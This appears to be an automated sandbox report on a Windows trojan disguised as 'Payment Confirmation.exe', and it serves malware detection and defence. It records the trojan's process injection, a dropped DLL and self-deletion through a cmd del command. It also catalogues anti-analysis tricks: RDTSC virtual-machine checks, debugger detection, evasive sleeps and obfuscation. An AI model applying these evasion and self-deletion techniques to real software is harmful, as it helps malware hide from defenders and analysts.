Source: unknown Process created: C:\Users\user\Desktop\Payment Confirmation.exe 'C:\Users\user\Desktop\Payment Confirmation.exe'
Source: C:\Users\user\Desktop\Payment Confirmation.exe Process created: C:\Users\user\Desktop\Payment Confirmation.exe 'C:\Users\user\Desktop\Payment Confirmation.exe'
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Payment Confirmation.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Payment Confirmation.exe Process created: C:\Users\user\Desktop\Payment Confirmation.exe 'C:\Users\user\Desktop\Payment Confirmation.exe' Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Payment Confirmation.exe' Jump to behavior
Source: C:\Users\user\Desktop\Payment Confirmation.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\Payment Confirmation.exe File created: C:\Users\user\AppData\Local\Temp\nse1E08.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.evad.winEXE@7/2@11/8
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_00402053 CoCreateInstance,MultiByteToWideChar, 1_2_00402053
Source: C:\Users\user\Desktop\Payment Confirmation.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_00404292 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 1_2_00404292
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3800:120:WilError_01
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Binary string: msiexec.pdb source: Payment Confirmation.exe, 00000004.00000002.438290968.0000000000E60000.00000040.00020000.sdmp
Source: Binary string: msiexec.pdbGCTL source: Payment Confirmation.exe, 00000004.00000002.438290968.0000000000E60000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdbUGP source: Payment Confirmation.exe, 00000001.00000003.364311124.000000000F080000.00000004.00000001.sdmp, Payment Confirmation.exe, 00000004.00000002.437196803.0000000000960000.00000040.00000001.sdmp, msiexec.exe, 0000000B.00000002.628302033.00000000044C0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: Payment Confirmation.exe, msiexec.exe

Data Obfuscation:

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\Payment Confirmation.exe Unpacked PE file: 4.2.Payment Confirmation.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_1000A525 push ecx; ret 1_2_1000A538
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 4_2_0041B87C push eax; ret 4_2_0041B882
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 4_2_0041B812 push eax; ret 4_2_0041B818
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 4_2_0041B81B push eax; ret 4_2_0041B882
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 4_2_0041CBE6 push dword ptr [2E339416h]; ret 4_2_0041CCB6
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0453D0D1 push ecx; ret 11_2_0453D0E4
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0046B87C push eax; ret 11_2_0046B882
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0046B812 push eax; ret 11_2_0046B818
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0046B81B push eax; ret 11_2_0046B882
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0046CBE6 push dword ptr [2E339416h]; ret 11_2_0046CCB6
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0046B7C5 push eax; ret 11_2_0046B818

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Users\user\Desktop\Payment Confirmation.exe File created: C:\Users\user\AppData\Local\Temp\nsp1E48.tmp\nawgsdqut.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Self deletion via cmd delete
Source: C:\Windows\SysWOW64\msiexec.exe Process created: /c del 'C:\Users\user\Desktop\Payment Confirmation.exe'
Source: C:\Windows\SysWOW64\msiexec.exe Process created: /c del 'C:\Users\user\Desktop\Payment Confirmation.exe' Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_10008856 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_10008856
Source: C:\Users\user\Desktop\Payment Confirmation.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\Payment Confirmation.exe RDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Payment Confirmation.exe RDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 1908 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2880 Thread sleep time: -34000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\msiexec.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 4_2_004088E0 rdtsc 4_2_004088E0
Source: C:\Users\user\Desktop\Payment Confirmation.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_00405E93 FindFirstFileA,FindClose, 1_2_00405E93
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 1_2_004054BD
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_00402671 FindFirstFileA, 1_2_00402671
Source: explorer.exe, 00000005.00000000.379906764.00000000083E9000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000005.00000000.418633743.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000005.00000000.414579080.00000000062E0000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.379906764.00000000083E9000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000005.00000000.414579080.00000000062E0000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.379564727.00000000082E2000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 00000005.00000000.379564727.00000000082E2000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000005.00000000.418633743.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
Source: explorer.exe, 00000005.00000000.370640534.000000000095C000.00000004.00000020.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_10009418 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 1_2_10009418
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_10009418 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 1_2_10009418
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_100098E2 GetProcessHeap, 1_2_100098E2
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 4_2_004088E0 rdtsc 4_2_004088E0
Enables debug privileges
Source: C:\Users\user\Desktop\Payment Confirmation.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_1001A402 mov eax, dword ptr fs:[00000030h] 1_2_1001A402
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_1001A616 mov eax, dword ptr fs:[00000030h] 1_2_1001A616
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_1001A6C7 mov eax, dword ptr fs:[00000030h] 1_2_1001A6C7
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_1001A706 mov eax, dword ptr fs:[00000030h] 1_2_1001A706
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_1001A744 mov eax, dword ptr fs:[00000030h] 1_2_1001A744
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04500050 mov eax, dword ptr fs:[00000030h] 11_2_04500050
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04500050 mov eax, dword ptr fs:[00000030h] 11_2_04500050
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0457C450 mov eax, dword ptr fs:[00000030h] 11_2_0457C450
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0457C450 mov eax, dword ptr fs:[00000030h] 11_2_0457C450
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0451A44B mov eax, dword ptr fs:[00000030h] 11_2_0451A44B
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045A2073 mov eax, dword ptr fs:[00000030h] 11_2_045A2073
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045B1074 mov eax, dword ptr fs:[00000030h] 11_2_045B1074
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0450746D mov eax, dword ptr fs:[00000030h] 11_2_0450746D
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04567016 mov eax, dword ptr fs:[00000030h] 11_2_04567016
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04567016 mov eax, dword ptr fs:[00000030h] 11_2_04567016
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04567016 mov eax, dword ptr fs:[00000030h] 11_2_04567016
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045B4015 mov eax, dword ptr fs:[00000030h] 11_2_045B4015
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045B4015 mov eax, dword ptr fs:[00000030h] 11_2_045B4015
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045B740D mov eax, dword ptr fs:[00000030h] 11_2_045B740D
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045B740D mov eax, dword ptr fs:[00000030h] 11_2_045B740D
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045B740D mov eax, dword ptr fs:[00000030h] 11_2_045B740D
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045A1C06 mov eax, dword ptr fs:[00000030h] 11_2_045A1C06
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045A1C06 mov eax, dword ptr fs:[00000030h] 11_2_045A1C06
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045A1C06 mov eax, dword ptr fs:[00000030h] 11_2_045A1C06
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045A1C06 mov eax, dword ptr fs:[00000030h] 11_2_045A1C06
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045A1C06 mov eax, dword ptr fs:[00000030h] 11_2_045A1C06
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045A1C06 mov eax, dword ptr fs:[00000030h] 11_2_045A1C06
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045A1C06 mov eax, dword ptr fs:[00000030h] 11_2_045A1C06
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045A1C06 mov eax, dword ptr fs:[00000030h] 11_2_045A1C06
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045A1C06 mov eax, dword ptr fs:[00000030h] 11_2_045A1C06
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045A1C06 mov eax, dword ptr fs:[00000030h] 11_2_045A1C06
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045A1C06 mov eax, dword ptr fs:[00000030h] 11_2_045A1C06
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045A1C06 mov eax, dword ptr fs:[00000030h] 11_2_045A1C06
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045A1C06 mov eax, dword ptr fs:[00000030h] 11_2_045A1C06
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045A1C06 mov eax, dword ptr fs:[00000030h] 11_2_045A1C06
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04566C0A mov eax, dword ptr fs:[00000030h] 11_2_04566C0A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04566C0A mov eax, dword ptr fs:[00000030h] 11_2_04566C0A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04566C0A mov eax, dword ptr fs:[00000030h] 11_2_04566C0A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04566C0A mov eax, dword ptr fs:[00000030h] 11_2_04566C0A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044FB02A mov eax, dword ptr fs:[00000030h] 11_2_044FB02A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044FB02A mov eax, dword ptr fs:[00000030h] 11_2_044FB02A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044FB02A mov eax, dword ptr fs:[00000030h] 11_2_044FB02A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044FB02A mov eax, dword ptr fs:[00000030h] 11_2_044FB02A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0451002D mov eax, dword ptr fs:[00000030h] 11_2_0451002D
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0451002D mov eax, dword ptr fs:[00000030h] 11_2_0451002D
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0451002D mov eax, dword ptr fs:[00000030h] 11_2_0451002D
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0451002D mov eax, dword ptr fs:[00000030h] 11_2_0451002D
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0451002D mov eax, dword ptr fs:[00000030h] 11_2_0451002D
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0451BC2C mov eax, dword ptr fs:[00000030h] 11_2_0451BC2C
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0457B8D0 mov eax, dword ptr fs:[00000030h] 11_2_0457B8D0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0457B8D0 mov ecx, dword ptr fs:[00000030h] 11_2_0457B8D0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0457B8D0 mov eax, dword ptr fs:[00000030h] 11_2_0457B8D0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0457B8D0 mov eax, dword ptr fs:[00000030h] 11_2_0457B8D0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0457B8D0 mov eax, dword ptr fs:[00000030h] 11_2_0457B8D0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0457B8D0 mov eax, dword ptr fs:[00000030h] 11_2_0457B8D0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045B8CD6 mov eax, dword ptr fs:[00000030h] 11_2_045B8CD6
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045A14FB mov eax, dword ptr fs:[00000030h] 11_2_045A14FB
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04566CF0 mov eax, dword ptr fs:[00000030h] 11_2_04566CF0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04566CF0 mov eax, dword ptr fs:[00000030h] 11_2_04566CF0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04566CF0 mov eax, dword ptr fs:[00000030h] 11_2_04566CF0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044E9080 mov eax, dword ptr fs:[00000030h] 11_2_044E9080
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04563884 mov eax, dword ptr fs:[00000030h] 11_2_04563884
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04563884 mov eax, dword ptr fs:[00000030h] 11_2_04563884
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044F849B mov eax, dword ptr fs:[00000030h] 11_2_044F849B
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0451F0BF mov ecx, dword ptr fs:[00000030h] 11_2_0451F0BF
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0451F0BF mov eax, dword ptr fs:[00000030h] 11_2_0451F0BF
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0451F0BF mov eax, dword ptr fs:[00000030h] 11_2_0451F0BF
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045290AF mov eax, dword ptr fs:[00000030h] 11_2_045290AF
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04507D50 mov eax, dword ptr fs:[00000030h] 11_2_04507D50
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04523D43 mov eax, dword ptr fs:[00000030h] 11_2_04523D43
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0450B944 mov eax, dword ptr fs:[00000030h] 11_2_0450B944
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0450B944 mov eax, dword ptr fs:[00000030h] 11_2_0450B944
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04563540 mov eax, dword ptr fs:[00000030h] 11_2_04563540
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0450C577 mov eax, dword ptr fs:[00000030h] 11_2_0450C577
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0450C577 mov eax, dword ptr fs:[00000030h] 11_2_0450C577
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044EC962 mov eax, dword ptr fs:[00000030h] 11_2_044EC962
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044EB171 mov eax, dword ptr fs:[00000030h] 11_2_044EB171
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044EB171 mov eax, dword ptr fs:[00000030h] 11_2_044EB171
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044E9100 mov eax, dword ptr fs:[00000030h] 11_2_044E9100
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044E9100 mov eax, dword ptr fs:[00000030h] 11_2_044E9100
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044E9100 mov eax, dword ptr fs:[00000030h] 11_2_044E9100
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0456A537 mov eax, dword ptr fs:[00000030h] 11_2_0456A537
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04514D3B mov eax, dword ptr fs:[00000030h] 11_2_04514D3B
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04514D3B mov eax, dword ptr fs:[00000030h] 11_2_04514D3B
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04514D3B mov eax, dword ptr fs:[00000030h] 11_2_04514D3B
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0451513A mov eax, dword ptr fs:[00000030h] 11_2_0451513A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0451513A mov eax, dword ptr fs:[00000030h] 11_2_0451513A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045B8D34 mov eax, dword ptr fs:[00000030h] 11_2_045B8D34
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04504120 mov eax, dword ptr fs:[00000030h] 11_2_04504120
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04504120 mov eax, dword ptr fs:[00000030h] 11_2_04504120
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04504120 mov eax, dword ptr fs:[00000030h] 11_2_04504120
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04504120 mov eax, dword ptr fs:[00000030h] 11_2_04504120
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04504120 mov ecx, dword ptr fs:[00000030h] 11_2_04504120
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044F3D34 mov eax, dword ptr fs:[00000030h] 11_2_044F3D34
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044F3D34 mov eax, dword ptr fs:[00000030h] 11_2_044F3D34
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044F3D34 mov eax, dword ptr fs:[00000030h] 11_2_044F3D34
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044F3D34 mov eax, dword ptr fs:[00000030h] 11_2_044F3D34
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044F3D34 mov eax, dword ptr fs:[00000030h] 11_2_044F3D34
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044F3D34 mov eax, dword ptr fs:[00000030h] 11_2_044F3D34
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044F3D34 mov eax, dword ptr fs:[00000030h] 11_2_044F3D34
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044F3D34 mov eax, dword ptr fs:[00000030h] 11_2_044F3D34
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044F3D34 mov eax, dword ptr fs:[00000030h] 11_2_044F3D34
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044F3D34 mov eax, dword ptr fs:[00000030h] 11_2_044F3D34
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044F3D34 mov eax, dword ptr fs:[00000030h] 11_2_044F3D34
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044F3D34 mov eax, dword ptr fs:[00000030h] 11_2_044F3D34
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044F3D34 mov eax, dword ptr fs:[00000030h] 11_2_044F3D34
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044EAD30 mov eax, dword ptr fs:[00000030h] 11_2_044EAD30
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04598DF1 mov eax, dword ptr fs:[00000030h] 11_2_04598DF1
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044EB1E1 mov eax, dword ptr fs:[00000030h] 11_2_044EB1E1
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044EB1E1 mov eax, dword ptr fs:[00000030h] 11_2_044EB1E1
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044EB1E1 mov eax, dword ptr fs:[00000030h] 11_2_044EB1E1
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044FD5E0 mov eax, dword ptr fs:[00000030h] 11_2_044FD5E0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044FD5E0 mov eax, dword ptr fs:[00000030h] 11_2_044FD5E0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045741E8 mov eax, dword ptr fs:[00000030h] 11_2_045741E8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04512990 mov eax, dword ptr fs:[00000030h] 11_2_04512990
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044E2D8A mov eax, dword ptr fs:[00000030h] 11_2_044E2D8A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044E2D8A mov eax, dword ptr fs:[00000030h] 11_2_044E2D8A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044E2D8A mov eax, dword ptr fs:[00000030h] 11_2_044E2D8A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044E2D8A mov eax, dword ptr fs:[00000030h] 11_2_044E2D8A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044E2D8A mov eax, dword ptr fs:[00000030h] 11_2_044E2D8A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0451FD9B mov eax, dword ptr fs:[00000030h] 11_2_0451FD9B
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0451FD9B mov eax, dword ptr fs:[00000030h] 11_2_0451FD9B
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0450C182 mov eax, dword ptr fs:[00000030h] 11_2_0450C182
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0451A185 mov eax, dword ptr fs:[00000030h] 11_2_0451A185
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04511DB5 mov eax, dword ptr fs:[00000030h] 11_2_04511DB5
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04511DB5 mov eax, dword ptr fs:[00000030h] 11_2_04511DB5
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04511DB5 mov eax, dword ptr fs:[00000030h] 11_2_04511DB5
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045651BE mov eax, dword ptr fs:[00000030h] 11_2_045651BE
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045651BE mov eax, dword ptr fs:[00000030h] 11_2_045651BE
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045651BE mov eax, dword ptr fs:[00000030h] 11_2_045651BE
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045651BE mov eax, dword ptr fs:[00000030h] 11_2_045651BE
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045135A1 mov eax, dword ptr fs:[00000030h] 11_2_045135A1
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045669A6 mov eax, dword ptr fs:[00000030h] 11_2_045669A6
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045161A0 mov eax, dword ptr fs:[00000030h] 11_2_045161A0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045161A0 mov eax, dword ptr fs:[00000030h] 11_2_045161A0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04574257 mov eax, dword ptr fs:[00000030h] 11_2_04574257
